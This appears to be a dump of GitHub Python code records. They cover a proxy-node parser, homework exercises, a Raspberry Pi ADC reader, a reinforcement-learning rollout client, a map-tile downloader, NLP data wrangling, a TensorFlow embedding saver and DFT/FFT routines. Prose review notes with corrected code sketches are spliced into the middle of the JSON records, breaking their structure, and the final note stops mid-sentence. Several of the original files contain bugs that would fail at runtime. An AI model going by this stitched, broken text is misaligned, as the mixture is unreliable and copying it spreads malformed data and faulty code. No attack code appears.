nodes_list=_parseNodeText(rawTxt)\n except Exception as e: \n log.err(f'[-]解析节点失败:\"{e}\"' ) \n return 
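As written, _getName builds the fallback f-string when the name is empty but never assigns or returns it, so re.sub is then applied to None and raises TypeError; the whitespace pattern should also be a raw string. A corrected sketch (random and re are assumed to be imported in this module):

def _getName(name) -> str:
    # strip whitespace; fall back to a random name when empty
    name = name.strip() if name else None
    if name is None:
        name = f"unknown_{random.randrange(1, 100000)}"   # assign the fallback
    return re.sub(r"\s+", '', name)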
nodes_list\n\n\n","repo_name":"co6co/py","sub_path":"clash/co6co_clash/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41298103836","text":"# -*- coding: utf-8 -*-\nimport math\n\nm=int(input('Digite a quantidade de listas: '))\nn=int(input('Digite a quantidade de elementos das listas: '))\n\nb=[]\nc=[]\n\ndef media(lista):\n soma=0\n for i in range(0,len(Lista),1):\n soma=soma+a[i]\n media=soma/n\n return media\n \ndef desvio(lista):\n soma=0\n for i in range(0,len(lista),1):\n soma=soma+(lista[i]-media(lista))**2\n desvio= (soma/(n-1))**(1/2)\n return desvio\n \nfor i in range(0,m,1):\n a=[]\n for i in range(0,n,1):\n valor=float(input('Digite o elemento da lista: '))\n a.append(valor)\n b.append(media(a))\n c.append(desvio(a))\nfor i in range(0,len(b),1):\n \n print('%.2f' %b[i])\n print('%.2f' %c[i])","repo_name":"rafaelperazzo/programacao-web","sub_path":"moodledata/vpl_data/457/usersdata/323/109542/submittedfiles/estatistica.py","file_name":"estatistica.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"14981699336","text":"# A for Rock, B for Paper, and C for Scissors\n# X for Rock, Y for Paper, and Z for Scissors\n\n# 1 for Rock, 2 for Paper, and 3 for Scissors\n# 0 if you lost, 3 if the round was a draw, and 6 if you won\n\ndef get_winner(player, me):\n score = 0\n if me == 'X':\n score += 1\n elif me == 'Y':\n score += 2\n elif me == 'Z':\n score += 3\n\n if ((player == 'A') and (me == 'Y')) or \\\n ((player == 'B') and (me == 'Z')) or \\\n ((player == 'C') and (me == 'X')):\n # me wins\n score += 6\n elif ((player == 'A') and (me == 'X')) or \\\n ((player == 'B') and (me == 'Y')) or \\\n ((player == 'C') and (me == 'Z')):\n # tie\n score += 3\n\n return score\n\n\nif __name__ == '__main__':\n # read in text file\n score = 0\n with open('input.txt', 'r') as f:\n for line in f:\n choices = line.strip().split(' ')\n\n score += get_winner(choices[0], choices [1])\n\n print(score) # 13924\n","repo_name":"Rampagy/AdventOfCode2022","sub_path":"Day02/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17263889907","text":"import time\nimport RPi.GPIO as GPIO\n\npotentiometer_adc = 0\nSPICLK = 0x12 #18\nSPIMOSI = 0x18 #24\nSPIMISO = 0x17 #23\nSPICS = 0x19 #25\n\n# Setup GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(SPIMOSI, GPIO.OUT)\nGPIO.setup(SPIMISO, GPIO.IN)\nGPIO.setup(SPICLK, GPIO.OUT)\nGPIO.setup(SPICS, GPIO.OUT)\n\n\ndef readadc(adcnum, clockpin, mosipin, misopin, cspin):\n\n GPIO.output(cspin, True)\n GPIO.output(clockpin, False)\n GPIO.output(cspin, False)\n \n commandout = (adcnum | 0x18) << 3\n\n for i in range(5):\n if (commandout & 0x80):\n GPIO.output(mosipin, True)\n else:\n GPIO.output(mosipin, False)\n commandout <<= 1\n GPIO.output(clockpin, True)\n GPIO.output(clockpin, False)\n \n adcout = 0\n for i in range(12):\n GPIO.output(clockpin, True)\n GPIO.output(clockpin, False)\n adcout <<= 1\n if (GPIO.input(misopin)):\n adcout |= 0x1\n\n GPIO.output(cspin, True)\n \n return adcout >> 1 # first bit is 'null' so drop it\n\n\n\n\nif __name__ == '__main__':\n\n for i in range(100):\n start = time.clock()\n res = readadc(potentiometer_adc, SPICLK, SPIMOSI, SPIMISO, SPICS)\n stop = time.clock()\n print('PotOutput: 
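In the estatistica.py record above, media(lista) loops over the undefined name Lista and sums the global list a instead of its parameter, so the first call raises NameError; it also divides by the global n rather than the list length. A corrected sketch:

def media(lista):
    soma = 0
    for i in range(len(lista)):
        soma = soma + lista[i]   # use the parameter, not the global `a`
    return soma / len(lista)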
{}\\tTimeDelay: {}'.format(res, stop-start))\n time.sleep(0.2)\n GPIO.cleanup()\n\n\n","repo_name":"gadsby/459_Project_Code","sub_path":"Oliver/tighterADC_code.py","file_name":"tighterADC_code.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41239838383","text":"from argparse import Namespace\nfrom typing import Any, List, Dict, Tuple\nfrom types import LambdaType\nfrom collections import defaultdict\n\nimport os\nimport time\nimport traceback\n\nimport ray\n\nfrom ray.util.queue import Queue\nfrom ray.actor import ActorHandle\n\nfrom malib.utils.logging import Logger\n\nfrom malib.utils.typing import AgentID, DataFrame, BehaviorMode\nfrom malib.utils.episode import Episode, NewEpisodeDict, NewEpisodeList\nfrom malib.utils.preprocessor import Preprocessor, get_preprocessor\nfrom malib.utils.timing import Timing\nfrom malib.remote.interface import RemoteInterface\nfrom malib.rollout.envs.vector_env import VectorEnv, SubprocVecEnv\nfrom malib.rollout.inference.ray.server import RayInferenceWorkerSet\nfrom malib.rollout.inference.utils import process_env_rets, process_policy_outputs\n\n\nclass RayInferenceClient(RemoteInterface):\n def __init__(\n self,\n env_desc: Dict[str, Any],\n dataset_server: ray.ObjectRef,\n max_env_num: int,\n use_subproc_env: bool = False,\n batch_mode: str = \"time_step\",\n postprocessor_types: Dict = None,\n training_agent_mapping: LambdaType = None,\n custom_config: Dict[str, Any] = {},\n ):\n \"\"\"Construct an inference client.\n\n Args:\n env_desc (Dict[str, Any]): Environment description\n dataset_server (_type_): A ray object reference.\n max_env_num (int): The maximum of created environment instance.\n use_subproc_env (bool, optional): Indicate subproc envrionment enabled or not. Defaults to False.\n batch_mode (str, optional): Batch mode, could be `time_step` or `episode` mode. Defaults to \"time_step\".\n postprocessor_types (Dict, optional): Post processor type list. Defaults to None.\n training_agent_mapping (LambdaType, optional): Agent mapping function. Defaults to None.\n custom_config (Dict[str, Any], optional): Custom configuration. 
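The timing loop in tighterADC_code.py relies on time.clock(), which was deprecated in Python 3.3 and removed in 3.8; time.perf_counter() is the documented replacement for measuring elapsed time:

start = time.perf_counter()
res = readadc(potentiometer_adc, SPICLK, SPIMOSI, SPIMISO, SPICS)
stop = time.perf_counter()
print('PotOutput: {}\tTimeDelay: {}'.format(res, stop - start))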
Defaults to an empty dict.\n \"\"\"\n\n self.dataset_server = dataset_server\n self.use_subproc_env = use_subproc_env\n self.batch_mode = batch_mode\n self.postprocessor_types = postprocessor_types or [\"defaults\"]\n self.process_id = os.getpid()\n self.timer = Timing()\n self.training_agent_mapping = training_agent_mapping or (lambda agent: agent)\n self.max_env_num = max_env_num\n self.custom_configs = custom_config\n\n agent_group = defaultdict(lambda: [])\n runtime_agent_ids = []\n for agent in env_desc[\"possible_agents\"]:\n runtime_id = training_agent_mapping(agent)\n agent_group[runtime_id].append(agent)\n runtime_agent_ids.append(runtime_id)\n self.runtime_agent_ids = set(runtime_agent_ids)\n self.agent_group = dict(agent_group)\n\n obs_spaces = env_desc[\"observation_spaces\"]\n act_spaces = env_desc[\"action_spaces\"]\n env_cls = env_desc[\"creator\"]\n env_config = env_desc[\"config\"]\n\n self.preprocessor: Dict[str, Preprocessor] = {\n agent: get_preprocessor(obs_spaces[agent])(obs_spaces[agent])\n for agent in env_desc[\"possible_agents\"]\n }\n\n if use_subproc_env:\n self.env = SubprocVecEnv(\n obs_spaces, act_spaces, env_cls, env_config, preset_num_envs=max_env_num\n )\n else:\n self.env = VectorEnv(\n obs_spaces, act_spaces, env_cls, env_config, preset_num_envs=max_env_num\n )\n\n def close(self):\n \"\"\"Disconnects with inference servers and turns off environment.\"\"\"\n\n if self.recv_queue is not None:\n _ = [e.shutdown(force=True) for e in self.recv_queue.values()]\n _ = [e.shutdown(force=True) for e in self.send_queue.values()]\n self.env.close()\n\n def run(\n self,\n agent_interfaces: Dict[AgentID, RayInferenceWorkerSet],\n rollout_config: Dict[str, Any],\n dataset_writer_info_dict: Dict[str, Tuple[str, Queue]] = None,\n ) -> Dict[str, Any]:\n \"\"\"Executes environment runner to collect training data or run purely simulation/evaluation.\n\n Note:\n Only simulation/evaluation tasks return evaluation information.\n\n Args:\n agent_interfaces (Dict[AgentID, InferenceWorkerSet]): A dict of agent interface servers.\n rollout_config (Dict[str, Any]): Rollout configuration.\n dataset_writer_info_dict (Dict[str, Tuple[str, Queue]], optional): Dataset writer info dict. 
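RayInferenceClient.close() dereferences self.recv_queue and self.send_queue, but __init__ never creates those attributes, so calling close() as written raises AttributeError. A defensive sketch, offered as a suggested hardening rather than the upstream API:

def close(self):
    """Shut down any attached queues, then close the environment."""
    for queues in (getattr(self, "recv_queue", None),
                   getattr(self, "send_queue", None)):
        if queues:
            _ = [e.shutdown(force=True) for e in queues.values()]
    self.env.close()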
Defaults to None.\n\n Returns:\n Dict[str, Any]: A dict of simulation results.\n \"\"\"\n\n # reset timer, ready for monitor\n self.timer.clear()\n task_type = rollout_config[\"flag\"]\n\n server_runtime_config = {\n \"preprocessor\": self.preprocessor,\n \"strategy_specs\": rollout_config[\"strategy_specs\"],\n }\n\n if task_type == \"rollout\":\n assert (\n dataset_writer_info_dict is not None\n ), \"rollout task has no available dataset writer\"\n server_runtime_config[\"behavior_mode\"] = BehaviorMode.EXPLORATION\n elif task_type in [\"evaluation\", \"simulation\"]:\n server_runtime_config[\"behavior_mode\"] = BehaviorMode.EXPLOITATION\n\n eval_results, performance = env_runner(\n self,\n agent_interfaces,\n rollout_config,\n server_runtime_config,\n dwriter_info_dict=dataset_writer_info_dict,\n )\n\n res = performance.copy()\n if task_type != \"rollout\":\n res[\"evaluation\"] = eval_results\n return res\n\n\ndef env_runner(\n client: RayInferenceClient,\n servers: Dict[str, RayInferenceWorkerSet],\n rollout_config: Dict[str, Any],\n server_runtime_config: Dict[str, Any],\n dwriter_info_dict: Dict[str, Tuple[str, Queue]] = None,\n) -> Tuple[List[Dict[str, Any]], Dict[str, float]]:\n \"\"\"The main logic of environment stepping, also for data collections.\n\n Args:\n client (InferenceClient): The inference client.\n rollout_config (Dict[str, Any]): Rollout configuration.\n server_runtime_config (Dict[str, Any]): A dict which gives the runtime configuration of inference server. Keys including\n\n - `preprocessor`: observation preprocessor.\n - `behavior_mode`: a value of `BehaviorMode`.\n - `strategy_spec`: a dict of strategy specs, mapping from runtime agent id to strategy spces.\n\n dwriter_info_dict (Dict[str, Tuple[str, Queue]], optional): A dict maps from runtime ids to a tuple of dataset writer info. 
Defaults to None.\n\n Raises:\n e: General exceptions.\n\n Returns:\n Tuple[List[Dict[str, Any]], Dict[str, float]]: A tuple of evaluation results and performance results.\n \"\"\"\n\n # check whether remote server or not\n evaluate_on = server_runtime_config[\"behavior_mode\"] == BehaviorMode.EXPLOITATION\n remote_actor = isinstance(list(servers.values())[0], ActorHandle)\n\n try:\n if dwriter_info_dict is not None:\n episodes = NewEpisodeList(\n num=client.env.num_envs, agents=client.env.possible_agents\n )\n else:\n episodes = None\n\n with client.timer.timeit(\"environment_reset\"):\n env_rets = client.env.reset(\n fragment_length=rollout_config[\"fragment_length\"],\n max_step=rollout_config[\"max_step\"],\n )\n\n env_dones, processed_env_ret, dataframes = process_env_rets(\n env_rets=env_rets,\n preprocessor=server_runtime_config[\"preprocessor\"],\n preset_meta_data={\"evaluate\": evaluate_on},\n )\n # env ret is key first, not agent first: state, obs\n if episodes is not None:\n episodes.record(\n processed_env_ret, agent_first=False, is_episode_done=env_dones\n )\n\n start = time.time()\n cnt = 0\n\n while not client.env.is_terminated():\n # group dataframes by runtime ids.\n grouped_data_frames: Dict[str, List[DataFrame]] = defaultdict(lambda: [])\n for agent, dataframe in dataframes.items():\n runtime_id = client.training_agent_mapping(agent)\n grouped_data_frames[runtime_id].append(dataframe)\n\n with client.timer.time_avg(\"policy_step\"):\n if remote_actor:\n policy_outputs: Dict[str, List[DataFrame]] = {\n rid: ray.get(\n server.compute_action.remote(\n grouped_data_frames[rid],\n runtime_config=server_runtime_config,\n )\n )\n for rid, server in servers.items()\n }\n else:\n policy_outputs: Dict[str, List[DataFrame]] = {\n rid: server.compute_action(\n grouped_data_frames[rid],\n runtime_config=server_runtime_config,\n )\n for rid, server in servers.items()\n }\n\n with client.timer.time_avg(\"process_policy_output\"):\n # TODO(ming): do not use async stepping\n env_actions, processed_policy_outputs = process_policy_outputs(\n policy_outputs, client.env\n )\n\n if episodes is not None:\n episodes.record(\n processed_policy_outputs,\n agent_first=True,\n is_episode_done=env_dones,\n )\n\n with client.timer.time_avg(\"environment_step\"):\n env_rets = client.env.step(env_actions)\n env_dones, processed_env_ret, dataframes = process_env_rets(\n env_rets=env_rets,\n preprocessor=server_runtime_config[\"preprocessor\"],\n preset_meta_data={\"evaluate\": evaluate_on},\n )\n # state, obs, rew, done\n if episodes is not None:\n episodes.record(\n processed_env_ret, agent_first=False, is_episode_done=env_dones\n )\n\n cnt += 1\n\n if dwriter_info_dict is not None:\n # episode_id: agent_id: dict_data\n episodes = episodes.to_numpy()\n for rid, writer_info in dwriter_info_dict.items():\n # get agents from agent group\n agents = client.agent_group[rid]\n batches = []\n # FIXME(ming): multi-agent is wrong!\n for episode in episodes:\n agent_buffer = [episode[aid] for aid in agents]\n batches.append(agent_buffer)\n writer_info[-1].put_nowait_batch(batches)\n end = time.time()\n rollout_info = client.env.collect_info()\n except Exception as e:\n traceback.print_exc()\n raise e\n\n performance = client.timer.todict()\n performance[\"FPS\"] = client.env.batched_step_cnt / (end - start)\n eval_results = rollout_info\n performance[\"total_timesteps\"] = client.env.batched_step_cnt\n\n return eval_results, 
performance\n","repo_name":"sjtu-marl/malib","sub_path":"malib/rollout/inference/ray/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"en","doc_type":"code","stars":439,"dataset":"github-code","pt":"94"} +{"seq_id":"74883799669","text":"import requests\nimport math\nimport random\nfrom PIL import Image\n# https://docs.microsoft.com/en-us/bingmaps/articles/bing-maps-tile-system\nEarthRadius = 6378137;\nMinLatitude, MaxLatitude = -85.05112878, 85.05112878\nMinLongitude, MaxLongitude = -180, 180\ndef clip(n, minv, maxv):\n return min(max(n, minv), maxv)\ndef map_size(level):\n return 256 << level\ndef ground_resolution(lat, level):\n lat = clip(lat, MinLatitude, MaxLatitude);\n return math.cos(lat * math.pi / 180) * 2 * math.pi * EarthRadius / map_size(level)\ndef latlon2PixXY(lat, lon, level):\n lat, lon = clip(lat, MinLatitude, MaxLatitude), clip(lon, MinLongitude, MaxLongitude)\n x = (lon + 180) / 360\n sinlat = math.sin(lat * math.pi / 180)\n y = 0.5 - math.log((1 + sinlat) / (1 - sinlat)) / (4 * math.pi);\n mapSize = map_size(level)\n return [int(clip(i * mapSize + .5, 0, mapSize - 1)) for i in [x, y]]\ndef pixXY2LatLon(pX, pY, level):\n mapSize = map_size(level)\n x = clip(pX, 0, mapSize - 1) / mapSize - .5\n y = .5 - clip(pY, 0, mapSize - 1) / mapSize\n return 90 - 360 * math.atan(math.exp(-y * 2 * math.py)) / math.pi, 360 * x\ndef pixXY2tileXY(pX, pY):\n return int(pX / 256), int(pY / 256)\ndef tileXY2pixXY(tX, tY):\n return tX * 256, tY * 256\ndef tileXY2QKey(tX, tY, level):\n ret, i = \"\", level\n while i > 0:\n mask = 1 << i - 1\n v = (1 if tX & mask != 0 else 0) + (2 if tY & mask != 0 else 0)\n ret, i = ret + str(v), i - 1\n return ret\ndef dfm2float(d, f, s):\n return d + f / 60.0 + s / 3600.0\ndef QKey2Url( qkey ):\n return 'http://a'+random.choice(['0','1','2','3'])+'.ortho.tiles.virtualearth.net/tiles/a' + qkey + '.png?g=50'\ndef getTile( qkey ):\n url , fn= QKey2Url(qkey) ,qkey+'.jpg'\n if os.path.exists( fn ):\n \treturn Image.open(fn)\n r = requests.get(url)\n with open(fn, 'ab') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n f.flush()\n return Image.open(fn)\ndef getQKeys(latD, latM, latS, lonD, lonM, lonS, level,w):\n h = w\n lat, lon = dfm2float(latD, latM, latS), dfm2float(lonD, lonM, lonS)\n px, py = latlon2PixXY(lat, lon, level)\n tx, ty = pixXY2tileXY(px,py)\n qkeys = []\n for i in range(h+1+h):\n qkeys.append([\"\" ]*(w+1+w) )\n for i in range(1+2*w):\n for j in range(1+2*h):\n qkeys [i][j]= tileXY2QKey( tx+i-w,ty + j -h ,level)\n return qkeys\n\ndef merge_up( qkeys ):\n rows,cols ,(w,h)= len(qkeys),len(qkeys[0]) , getTile(qkeys[0][0]).size\n val = Image.new( 'RGB', ( w*cols, h*rows ), 255)\n for i in range(rows):\n for j in range(cols):\n print(i,j,qkeys[i][j]) \n val.paste(getTile( qkeys[i][j] ), ( i*w,j*h ) )\n return val\n\ndef GetMyImg( latD, latM, latS, lonD, lonM, lonS, level, width):\n keys = getQKeys(latD, latM, latS, lonD, lonM, lonS, level, width )\n merge_up(keys).save( keys[width][width]+'-'+ str(level) +\"-\" + str(width)+'.jpg' )\n\nfor level in [18]:\n\tfor width in [30]:\n\t\tGetMyImg(35,54,10,126,36,59,level,width)\n","repo_name":"gq4fabric/ve_tile_merge","sub_path":"msveTiles.py","file_name":"msveTiles.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29309341376","text":"import plotly.graph_objs as go\n\nimport pandas as pd\n\nfrom nltk.stem 
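Two fixes for msveTiles.py above: getTile calls os.path.exists without os ever being imported, and pixXY2LatLon references the non-existent attribute math.py (a typo for math.pi), so both paths raise at runtime. A corrected sketch following the Bing Maps tile-system formula the file links to:

import os  # required by getTile

def pixXY2LatLon(pX, pY, level):
    mapSize = map_size(level)
    x = clip(pX, 0, mapSize - 1) / mapSize - .5
    y = .5 - clip(pY, 0, mapSize - 1) / mapSize
    return 90 - 360 * math.atan(math.exp(-y * 2 * math.pi)) / math.pi, 360 * x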
import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\n\nfrom sklearn.externals import joblib\n\nfrom sqlalchemy import create_engine\n\nimport nltk\n\nnltk.download('stopwords')\nnltk.download('wordnet') # download for lemmatization\n\n\ndef tokenize(text):\n \"\"\" Transform text into list of tokens with stopwords removed.\n \n Args :\n text (str) : Text\n \n Output :\n clean tokens (list) : Tokens with stopwords removed\n \n \"\"\"\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n\ndef get_data():\n \"\"\" Load data.\n \n Args :\n None\n \n Outputs :\n df : pandas dataframe containing the messages and their categories.\n \n \"\"\"\n\n engine = create_engine('sqlite:///../data/DisasterResponse.db')\n df = pd.read_sql_table('DisasterResponse.db', engine)\n return df\n\n\ndef get_model():\n \"\"\" Load model.\n \n Args :\n None\n \n Outputs :\n model : model trained to classify messages previously trained.\n \n \"\"\"\n model = joblib.load(\"../models/classifier.pkl\")\n return model\n\n\ndef get_graphs():\n \"\"\" Creates two plotly visualizations.\n\n Args :\n None\n\n Output:\n graphs (list(dict)): list containing the four plotly visualizations\n\n \"\"\"\n # Get the data\n df = get_data()\n\n # create visuals\n graphs = []\n\n # graph 1\n graph_one = []\n\n genre_counts = df.groupby('genre').count()['message']\n genre_names = list(genre_counts.index)\n\n graph_one.append(\n go.Bar(\n x=genre_names,\n y=genre_counts,\n )\n )\n\n layout_one = dict(title='Distribution of Message Genres',\n xaxis=dict(title=\"Genre\"),\n yaxis=dict(title=\"Count\"),\n )\n\n # graph 2\n graph_two = []\n\n categories_names = df.columns[5:-1]\n categories_counts = df[categories_names].sum()\n\n graph_two.append(\n go.Bar(\n x=categories_names,\n y=categories_counts,\n marker=dict(color='red')\n )\n )\n\n layout_two = dict(title='Distribution of Message Categories',\n xaxis=dict(tickangle=-45),\n yaxis=dict(title=\"Count\"),\n )\n\n graphs.append(dict(data=graph_one, layout=layout_one))\n graphs.append(dict(data=graph_two, layout=layout_two))\n\n return graphs\n","repo_name":"olgob/Disaster-response-pipelines","sub_path":"app/wrangling.py","file_name":"wrangling.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"25821167265","text":"import tensorflow as tf\nfrom utils.WordSegmenter import WordSegmenter\nimport pickle\nimport argparse\nimport numpy as np\nimport time\nimport os\n\nfrom models import assemble_graph\n\n\nparser = argparse.ArgumentParser(description='Train word vectors')\nparser.add_argument('-d', type=int, default=300, dest='dimensionality', help='Trained embedding dimensionality')\nparser.add_argument('-v', type=int, default=100001, dest='vocabulary_size', help='Size of vocabulary to train')\nparser.add_argument('-m', type=str, default='skipgram', dest='model_name', help='Trained model')\nparser.add_argument('-l', type=str, default='en', dest='language', help='Language of wikipedia dump')\nparser.add_argument('-sgm', type=str, dest='segmenter', help='Segmenter Path')\nparser.add_argument('-sgmlen', type=int, dest='segmenter_len', help='Maximum length of segmented sequence')\nparser.add_argument('graph_saving_path', type=str, help='Ckpt path')\n\n\nargs = parser.parse_args()\n\n\nn_dims = 
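The import from sklearn.externals near the top of this wrangling.py record stopped working when scikit-learn removed the vendored copy (deprecated in 0.21, removed in 0.23); importing joblib directly keeps get_model running on current versions:

import joblib  # replaces: from sklearn.externals import joblib

def get_model():
    """Load the previously trained message classifier."""
    return joblib.load("../models/classifier.pkl")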
args.dimensionality\nmodel_name = args.model_name\nlang = args.language\nsgm_path = args.segmenter\nsgm_len = args.segmenter_len\nfull_voc_size = 200001#args.full_vocabulary_size\ngraph_saving_path = args.graph_saving_path\nvocab_size = args.vocabulary_size\n\nckpt_path = os.path.join(graph_saving_path, \"model.ckpt\")\n\n\ndef assign_embeddings(sess, terminals, vocab_size):\n in_words_ = terminals['in_words']\n final_ = terminals['final']\n dropout_ = terminals['dropout']\n attention_ = terminals['attention_mask']\n\n print(\"\\t\\tDumpung vocabulary of size %d\" % vocab_size)\n ids = np.array(list(range(vocab_size)), dtype=np.int32)\n\n if model_name == 'morph' or model_name == 'fasttext':\n ids_expanded = segmenter.segment(ids)\n\n emb_sum_path = \"./embeddings/%s_%d_sum.pkl\" % (model_name, vocab_size)\n final_sum = sess.run(final_, {in_words_: ids_expanded, dropout_: 1.0})\n pickle.dump(final_sum, open(emb_sum_path, \"wb\"))\n\n emb_voc_path = \"./embeddings/%s_%d_voc.pkl\" % (model_name, vocab_size)\n id_voc = np.zeros_like(ids_expanded)\n id_voc[:,0] = ids\n final_voc = sess.run(final_, {in_words_: id_voc, dropout_: 1.0})\n pickle.dump(final_voc, open(emb_voc_path, \"wb\"))\n\n if model_name == 'skipgram':\n emb_dump_path = \"./embeddings/%s_%d.pkl\" % (model_name, vocab_size)\n final = sess.run(final_, {in_words_: ids_expanded,\n dropout_: 1.0})\n pickle.dump(final, open(emb_dump_path, \"wb\"))\n\n if model_name == 'attentive':\n sgm_p = sgm_path.split(\"/\")[0]\n emb_dump_path = \"./embeddings/%s_%s_%d.pkl\" % (model_name, sgm_p, vocab_size)\n dump_path = \"./embeddings/attention_mask_%s_%s_%d.pkl\" % (sgm_p, model_name, vocab_size)\n\n attention_mask = sess.run(attention_, {in_words_: ids_expanded,\n dropout_: 1.0})\n pickle.dump(attention_mask, open(dump_path, \"wb\"))\n pickle.dump(final, open(emb_dump_path, \"wb\"))\n\n\n\nprint(\"Starting saving\", time.asctime( time.localtime(time.time()) ))\n\nif model_name != 'skipgram':\n segmenter = WordSegmenter(sgm_path, lang, sgm_len)\n sgm = segmenter.segment\n\n segm_voc_size = segmenter.unique_segments\n word_segments = segmenter.max_len\n\n print(\"Max Word Len is %d segments\" % word_segments)\n\n terminals = assemble_graph(model=model_name,\n vocab_size=full_voc_size,\n segment_vocab_size=segm_voc_size,\n max_word_segments=word_segments,\n emb_size=n_dims)\nelse:\n\n terminals = assemble_graph(model=model_name,\n vocab_size=full_voc_size,\n emb_size=n_dims)\n\n\nin_words_ = terminals['in_words']\nout_words_ = terminals['out_words']\nlabels_ = terminals['labels']\ntrain_ = terminals['train']\nloss_ = terminals['loss']\nadder_ = terminals['adder']\nlr_ = terminals['learning_rate']\nbatch_count_ = terminals['batch_count']\n\n\nsaver = tf.train.Saver()\nsaveloss_ = tf.summary.scalar('loss', loss_)\n\n\ndef save_snapshot(sess, terminals, vocab_size):\n batch_count = sess.run(terminals['batch_count'])\n path = \"./models/%s_%d_%d\" % (model_name, vocab_size, batch_count)\n ckpt_p = \"%s/model.ckpt\" % path\n assign_embeddings(sess, terminals, vocab_size)\n # save_path = saver.save(sess, ckpt_p)\n\n\nepoch = 0\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # Restore from checkpoint\n saver.restore(sess, ckpt_path)\n sess.graph.as_default()\n\n save_snapshot(sess, terminals, vocab_size)\n\nprint(\"Finished saving\", time.asctime( time.localtime(time.time()) 
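In assign_embeddings above, ids_expanded is assigned only in the morph/fasttext branch yet read in the skipgram branch, and the attentive branch dumps final without ever computing it, so both paths raise NameError. A minimal repair for the attentive branch, assuming segmented ids are wanted there as well:

if model_name == 'attentive':
    ids_expanded = segmenter.segment(ids)   # previously set only for morph/fasttext
    final = sess.run(final_, {in_words_: ids_expanded, dropout_: 1.0})
    attention_mask = sess.run(attention_, {in_words_: ids_expanded, dropout_: 1.0})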
))","repo_name":"VitalyRomanov/segmented-embeddings","sub_path":"stream_saver.py","file_name":"stream_saver.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8609213078","text":"import numpy as np\n\n####################################################################################################\n# Exercise 1: DFT\n\ndef dft_matrix(n: int) -> np.ndarray:\n \"\"\"\n Construct DFT matrix of size n.\n\n Arguments:\n n: size of DFT matrix\n\n Return:\n F: DFT matrix of size n\n\n \"\"\"\n F = np.zeros((n, n), dtype='complex128')\n \n w = np.zeros(n, dtype='complex128')\n w = np.exp(((-2*np.pi) * 1j)/ n)\n \n for i in range (n):\n for i_2 in range (n):\n F[i][i_2] = np.power(w,(i_2 * i))\n F = np.dot((1/np.sqrt(n)), F)\n \n\n return F\n\n\ndef is_unitary(matrix: np.ndarray) -> bool:\n \"\"\"\n Check if the passed in matrix of size (n times n) is unitary.\n\n Arguments:\n matrix: the matrix which is checked\n\n Return:\n unitary: True if the matrix is unitary\n \"\"\"\n \n mcon= matrix.conjugate().T\n return np.allclose(np.dot(mcon, matrix), np.identity(len(matrix)))\n\n\ndef create_harmonics(n: int = 128) -> (list, list):\n \"\"\"\n Create delta impulse signals and perform the fourier transform on each signal.\n\n Arguments:\n n: the length of each signal\n\n Return:\n sigs: list of np.ndarrays that store the delta impulse signals\n fsigs: list of np.ndarrays with the fourier transforms of the signals\n \"\"\"\n sigs = []\n sigs_m = np.identity(n)\n for i in range (n):\n sigs.append(sigs_m[i])\n \n fsigs = []\n for i in range (n):\n fsigs.append(np.dot(dft_matrix(n), sigs[i]))\n\n\n return sigs, fsigs\n\n\n####################################################################################################\n# Exercise 2: FFT\n\n\ndef shuffle_bit_reversed_order(data: np.ndarray) -> np.ndarray:\n \"\"\"\n Shuffle elements of data using bit reversal of list index.\n\n Arguments:\n data: data to be transformed (shape=(n,), dtype='float64')\n\n Return:\n data: shuffled data array\n \"\"\"\n datacopy = data.copy()\n data_b = []\n data_b_r = []\n data_i = np.zeros(len(data), dtype = int)\n width = len(\"{0:b}\".format(len(data)-1))\n loadi = 0\n for i in range (len(data)):\n data_b.append('{:0{width}b}'.format(i, width=width))\n for b in data_b:\n data_b_r.append(b[::-1])\n for b in data_b_r:\n data_i[loadi] = int(b, 2)\n loadi += 1\n for i in range (len(data_i)):\n data[i] = datacopy[data_i[i]] \n return data\n\n\ndef fft(data: np.ndarray) -> np.ndarray:\n \"\"\"\n Perform real-valued discrete Fourier transform of data using fast Fourier transform.\n\n Arguments:\n data: data to be transformed (shape=(n,), dtype='float64')\n\n Return:\n fdata: Fourier transformed data\n\n Note:\n This is not an optimized implementation but one to demonstrate the essential ideas\n of the fast Fourier transform.\n\n \"\"\"\n\n fdata = np.asarray(data, dtype='complex128')\n n = fdata.size\n fdata = shuffle_bit_reversed_order(fdata)\n if not n > 0 or (n & (n - 1)) != 0:\n raise ValueError\n\n \n\n treedepth = int(np.log2(n))\n for m in range (treedepth):\n for k in range (2**m):\n for i in range (0, n, (2**(m+1))):\n i = i+k\n j = i + 2**m \n omega = np.exp((-2 * np.pi * 1j* k)/(2**(m+1))) * fdata[j]\n fdata[j] = fdata[i] - omega\n fdata[i] = fdata[i] + omega\n \n \n fdata = (1/np.sqrt(n))* fdata \n return fdata\n\n\ndef generate_tone(f: float = 261.626, num_samples: int = 44100) -> np.ndarray:\n \"\"\"\n Generate 
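dft_matrix and fft both apply the orthonormal 1/sqrt(n) scaling, so for power-of-two lengths they should match NumPy's forward transform under norm='ortho'. A quick self-check sketch, assuming the functions above are importable:

data = np.random.default_rng(0).standard_normal(64)   # length must be a power of two
assert is_unitary(dft_matrix(8))
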